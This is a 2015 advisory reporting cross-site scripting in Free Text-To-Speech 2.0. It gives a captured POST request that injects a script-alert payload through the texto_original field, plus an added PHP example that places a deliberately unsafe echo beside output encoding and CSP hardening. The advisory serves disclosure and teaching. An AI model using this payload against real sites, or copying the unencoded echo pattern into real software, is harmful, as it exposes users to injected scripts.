Free Text-To-Speech version 2.0 suffers from a cross-site scripting vulnerability.
+---------------------------------------------------------------------------+
#[+] Author: TUNISIAN CYBER
#[+] Title: Free Text-To-Speech System Cross Site Scripting
#[+] Date: 19-04-2015
#[+] Type: WebAPP
#[+] Tested on: KaliLinux
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
+---------------------------------------------------------------------------+
POC:
http://i.imgur.com/Pstv89u.png
http://127.0.0.1/nanbiquara_v2.0/

POST /nanbiquara_v2.0/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/nanbiquara_v2.0/
Cookie: ck_login_id_20=1; ck_login_language_20=en_us; ck_login_theme_20=Sugar5
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

texto_original=%3Cscript%3Ealert%28%22XSS+TUNISIAN+CYBER%22%29%3B%3C%2Fscript%3E&voz=br1%2Fbr1

HTTP/1.1 200 OK
Date: Sun, 19 Apr 2015 20:12:59 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.39-0+deb7u2
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 830
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
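
Added example (not part of the advisory and not the application's own code): the request above posts markup in texto_original, so the PHP below puts the unencoded echo pattern beside an output-encoded one, using the request body from the POC as input. The function names, the <p> output context, the voice allow-list and the response headers are assumptions made for illustration; the captured response also declares text/html without a charset, which the hardened headers set explicitly.

```php
<?php
// Added example: hypothetical handler code, not the application's source.
declare(strict_types=1);

// Assumption: voices form a small fixed set; only "br1/br1" appears in the capture.
const ALLOWED_VOICES = ['br1/br1'];

/** Vulnerable pattern: request data concatenated into HTML unchanged. */
function render_unsafe(string $text): string
{
    return '<p class="texto">' . $text . '</p>';
}

/** Hardened pattern: encode for the HTML element context at output time. */
function render_safe(string $text): string
{
    // ENT_QUOTES also covers attribute contexts; ENT_SUBSTITUTE replaces
    // invalid UTF-8 instead of returning an empty string.
    $encoded = htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<p class="texto">' . $encoded . '</p>';
}

/** Allow-list the voice selector instead of trusting the posted value. */
function pick_voice(string $voice): string
{
    return in_array($voice, ALLOWED_VOICES, true) ? $voice : ALLOWED_VOICES[0];
}

// Request body copied from the POC, decoded the same way PHP fills $_POST.
$body = 'texto_original=%3Cscript%3Ealert%28%22XSS+TUNISIAN+CYBER%22%29%3B'
      . '%3C%2Fscript%3E&voz=br1%2Fbr1';
parse_str($body, $post);

if (PHP_SAPI !== 'cli') {
    // Declare the charset explicitly and disallow inline script as a second layer.
    header('Content-Type: text/html; charset=UTF-8');
    header("Content-Security-Policy: default-src 'self'; script-src 'self'");
    header('X-Content-Type-Options: nosniff');
}

echo 'unsafe: ', render_unsafe($post['texto_original']), PHP_EOL;
echo 'safe:   ', render_safe($post['texto_original']), PHP_EOL;
echo 'voice:  ', pick_voice($post['voz']), PHP_EOL;
```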